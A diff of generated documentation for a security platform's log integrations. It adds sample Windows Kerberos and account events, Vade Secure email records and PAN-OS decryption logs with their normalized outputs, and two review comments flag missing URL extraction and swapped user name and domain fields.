"TargetSid": "S-1-2-3-4-5", + "TargetUserName": 
"smithee.a", + "TargetDomainName": "DOMAIN" }, - "record_id": 8884538, + "record_id": 25349190364, + "event_id": "4726", "api": "wineventlog", - "opcode": "Info" - }, - "host": { - "hostname": "host01", - "id": "abcdefgh-1234-5678-abcd-efgh12345678", - "ip": [ - "8.8.8.8" - ], - "name": "host01", - "mac": [ - "00-11-22-33-44-55" - ], - "architecture": "x86_64", - "os": { - "build": "20348.2031", - "version": "10.0", - "name": "Windows Server 2022 Standard", - "family": "windows", - "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", - "type": "windows", - "platform": "windows" - } - }, - "log": { - "level": "information" + "provider_name": "Microsoft-Windows-Security-Auditing", + "task": "User Account Management", + "computer_name": "hostname.domain.net" }, "ecs": { - "version": "8.0.0" + "version": "1.12.0" }, - "agent": { - "type": "winlogbeat", - "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", - "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", - "version": "8.10.4", - "name": "HOST01" - } + "host": { + "name": "hostname.domain.net" + }, + "tags": [ + "windows", + "domain-controller", + "beats_input_codec_plain_applied" + ] } ``` 
@@ -2147,6 +3213,156 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_event_4768" + + + ```json + { + "event": { + "provider": "Microsoft-Windows-Security-Auditing", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "code": "4768", + "outcome": "success", + "created": "2024-11-12T09:17:12.392Z", + "action": "Service d\u2019authentification Kerberos", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:17:10.124Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service 
:\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "host": { + "name": "HOSTNAME.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "channel": "Security", + "task": "Service d\u2019authentification Kerberos", + "computer_name": "HOSTNAME.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "event_data": { + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010", + "IpPort": "51261", + "TargetDomainName": "DOMAIN", + "TargetUserName": "account", + "TargetSid": "S-1-2-3", + "PreAuthType": "2", + "Status": "0x0", + "ServiceSid": "S-1-2-3-4-5", + "IpAddress": "::ffff:1.2.3.4", + "ServiceName": "service" + }, + "process": { + "thread": { + "id": 3228 + }, + "pid": 560 + }, + "event_id": "4768", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 2476587536 + }, + "@version": "1" + } + ``` + + + +=== "security_event_4769" + + + ```json + { + "event": { + "provider": 
"Microsoft-Windows-Security-Auditing", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "code": "4769", + "outcome": "success", + "created": "2024-11-12T09:17:05.023Z", + "action": "Op\u00e9rations de ticket du service Kerberos", + "kind": "event" + }, + "@timestamp": "2024-11-12T09:17:02.856Z", + "ecs": { + "version": "8.0.0" + }, + "tags": [ + "forwarded", + "beats_input_codec_plain_applied" + ], + "log": { + "level": "information" + }, + "message": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "host": { + "name": "HOST01.domain.priv" + }, + "agent": { + "name": "AGENT", + "version": "8.11.1", + "type": "winlogbeat", + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee" + }, + "winlog": { + "provider_guid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "channel": "Security", + "task": "Op\u00e9rations de ticket du service Kerberos", + "computer_name": "HOST01.domain.priv", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "event_data": { + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "IpPort": "50754", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TransmittedServices": "-", + "IpAddress": "::ffff:1.2.3.4", + "ServiceName": "SERVICE$" + }, + "process": { + "thread": { + "id": 7992 + }, + "pid": 560 + }, + "event_id": "4769", + "api": "wineventlog", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": 2476587153 + }, + "@version": "1" + } + ``` + + + === "security_event_4771" 
@@ -2392,6 +3608,112 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_event_4798" + + + ```json + { + "@timestamp": "2024-11-12T08:25:34.741Z", + "event": { + "action": "User Account Management", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "code": "4798", + "created": "2024-11-12T08:25:35.614Z", + "kind": "event", + "dataset": "system.security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe" + }, + "message": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "elastic_agent": { + "version": "8.14.1", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "snapshot": false + }, + "log": { + "level": "information" + }, + "data_stream": { + "type": "logs", + "dataset": "system.security", + "namespace": "windows" + }, + "ecs": { + "version": "8.0.0" + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "keywords": [ + "Audit Success" + ], + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "channel": "Security", + "task": "User Account Management", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "event_data": { + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest", + "SubjectDomainName": "DOMAIN", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectUserName": "ACC0123$", + "TargetDomainName": 
"ACC0123", + "SubjectLogonId": "0x3e7", + "SubjectUserSid": "S-1-2-3", + "CallerProcessId": "0x123" + }, + "provider_name": "Microsoft-Windows-Security-Auditing", + "api": "wineventlog", + "opcode": "Info", + "computer_name": "ACC0123.johndoe.com", + "record_id": 1524672, + "event_id": "4798" + }, + "input": { + "type": "winlog" + }, + "@version": "1", + "agent": { + "version": "8.14.1", + "type": "filebeat", + "name": "ACC0123", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef" + }, + "tags": [ + "Windows", + "beats_input_codec_plain_applied" + ], + "host": { + "hostname": "hostname", + "architecture": "x86_64", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "name": "hostname", + "mac": [ + "00-11-22-33-44-55" + ], + "os": { + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "version": "10.0", + "type": "windows", + "name": "Windows Server 2022 Standard", + "build": "20348.169", + "family": "windows", + "platform": "windows" + }, + "ip": [ + "1.2.3.4" + ] + } + } + ``` + + + === "security_event_4964" diff --git a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md index 32c45a3c7..59f4c8972 100644 --- a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md +++ b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232.md 
@@ -186,6 +186,64 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "email_02.json" + + ```json + + { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } + + ``` + + === "email_action_move.json" ```json 
@@ -340,6 +398,80 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "email_with_attachment_02.json" + + ```json + + { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": 
"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + "filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } + + ``` + + === "remediation_auto.json" ```json @@ -431,6 +563,7 @@ The following table lists the fields that are extracted, normalized under the EC |`email.from.address` | `keyword` | email.from.address | |`email.local_id` | `keyword` | email.local_id | |`email.message_id` | `keyword` | email.message_id | +|`email.reply_to.address` | `keyword` | Address replies should be delivered to. | |`email.subject` | `keyword` | email.subject | |`email.to.address` | `keyword` | email.to.address | |`event.action` | `keyword` | The action captured by the event. | diff --git a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md index b4be52c9b..928291f27 100644 --- a/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md +++ b/_shared_content/operations_center/integrations/generated/e4a758fc-7620-49e6-b8ed-b7fb3d7fa232_sample.md 
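Review bot: The raw message in this hunk contains `"urls": [{"url": "http://www.company.fr/"}]`, yet the parsed output exposes no `url.*` field and `related.*` holds only the sender IP, so the one URL in the mail is not searchable after normalization. If the parser is meant to extract URLs, the expected output for this sample should include at least `url.original` (and the host under `related.hosts`); if extraction is intentionally limited to attachments, a line in the integration's field table saying so would stop analysts from writing rules on a field that is never populated. The vadesecure field table is outside this chunk, so this may already be documented.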
@@ -129,6 +129,53 @@ In this section, you will find examples of raw logs as generated natively by the +=== "email_02" + + + ```json + { + "id": "cs72a9b6r0glddhdfh7g", + "date": "2024-10-15T08:17:41.776Z", + "sender_ip": "1.2.3.4", + "from": "jd@doe.fr", + "from_header": "John Doe", + "to": "alan.smithee@doe.fr", + "to_header": "Alan.smithee@doe.fr", + "subject": "Informations", + "message_id": "", + "urls": [], + "attachments": [], + "status": "LEGIT", + "substatus": "", + "last_report": "none", + "last_report_date": "0001-01-01T00:00:00Z", + "remediation_type": "none", + "remediation_ids": [], + "action": "NOTHING", + "folder": "", + "size": 26875, + "current_events": [], + "whitelisted": false, + "direction": "incoming", + "remediation_message_read": false, + "geo": { + "country_name": "United States", + "country_iso_code": "US", + "city_name": "" + }, + "malware_bypass": false, + "reply_to_header": "user@company.com", + "overdict": "clean", + "auth_results_details": { + "dkim": "none", + "spf": "temperror", + "dmarc": "fail" + } + } + ``` + + + === "email_action_move" 
@@ -256,6 +303,70 @@ In this section, you will find examples of raw logs as generated natively by the +=== "email_with_attachment_02" + + + ```json + { + "id": "csb6q1pgfisg9knp1l5g", + "date": "2024-10-21T15:02:31.64Z", + "sender_ip": "1.2.3.4", + "from": "john.doe@mail.fr", + "from_header": "John DOE ", + "to": "alan.smithee@company.fr", + "to_header": "Alan Smithee ", + "subject": "Re: Your mail", + "message_id": "", + "urls": [ + { + "url": "http://www.company.fr/" + } + ], + "attachments": [ + { + "id": "12345678901234567890", + "filename": "image001.jpg", + "extension": "jpg", + "size": 5130, + "hashes": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + } + } + ], + "status": "LEGIT", + "substatus": "", + "last_report": "none", + "last_report_date": "0001-01-01T00:00:00Z", + "remediation_type": "none", + "remediation_ids": [], + "action": "NOTHING", + "folder": "", + "size": 93072, + "current_events": [], + "whitelisted": false, + "direction": "incoming", + "remediation_message_read": false, + "geo": { + "country_name": "United States", + "country_iso_code": "US", + "city_name": "" + }, + "malware_bypass": false, + "reply_to_header": "", + "overdict": "clean", + "auth_results_details": { + "dkim": "fail", + "spf": "temperror", + "dmarc": "none" + } + } + ``` + + + === "remediation_auto" diff --git a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md index b50409079..37bbc3d5f 100644 --- a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md 
+++ b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630.md
@@ -304,6 +304,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "1.1.1.1"
 ],
 "user": [
+ "paloaltonetwork",
 "xxxxx"
 ]
 },
@@ -325,8 +326,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 }
 },
 "user": {
- "domain": "paloaltonetwork",
- "name": "xxxxx"
+ "domain": "xxxxx",
+ "name": "paloaltonetwork"
 }
 }
@@ -497,6 +498,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "5.6.7.8"
 ],
 "user": [
+ "domain",
 "pusername",
 "userdest"
 ]
@@ -521,8 +523,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 }
 },
 "user": {
- "domain": "domain",
- "name": "pusername"
+ "domain": "pusername",
+ "name": "domain"
 }
 }
@@ -722,6 +724,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "type": "0"
 },
 "host": {
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
 "name": "AAAABBBBB",
 "os": {
 "version": "Microsoft Windows 10 Pro , 64-bit"
@@ -797,6 +800,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "type": "0"
 },
 "host": {
+ "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
 "name": "2021-02707",
 "os": {
 "version": "Microsoft Windows 10 Enterprise , 64-bit"
@@ -822,6 +826,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "88.120.236.74"
 ],
 "user": [
+ "example.org",
 "test"
 ]
 },
@@ -837,8 +842,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 }
 },
 "user": {
- "domain": "example.org",
- "name": "test"
+ "domain": "test",
+ "name": "example.org"
 },
 "user_agent": {
 "os": {
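Review bot: Every `user` block rewritten in this line's hunks (`@@ -325`, `@@ -521`, `@@ -837`) swaps the two values so that `user.domain` now holds the login and `user.name` the directory: `"domain": "test", "name": "example.org"` replaces the previous, correct `"domain": "example.org", "name": "test"`. The same inversion appears in the `@@ -1938` hunk, in the new `test_decryption_json.json` sample (raw `SourceUser` is `example\\jdoe` and `source.user` is mapped as domain `example` / name `jdoe`, yet top-level `user` is domain `jdoe` / name `example`), in `test_hipmatch_json.json`, and in the `@@ -3840` hunk, where the neighbouring `@@ -3831` hunk additionally drops `JDOE` from `related.user` altogether. Detection rules and pivots keyed on `user.name` would silently match the realm instead of the account, so this looks like a regression in the parser's top-level user mapping rather than a corrected expectation, though the raw messages for the three hunks here are outside the chunk. The expected values should keep the previous orientation, e.g. `"domain": "example.org",` / `"name": "test"`, and `related.user` should carry the login (`test`, `JDOE`) rather than only the domain.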
@@ -1599,6 +1604,217 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_decryption_csv.json" + + ```json + + { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome 
Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_decryption_json.json" + + ```json + + { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default 
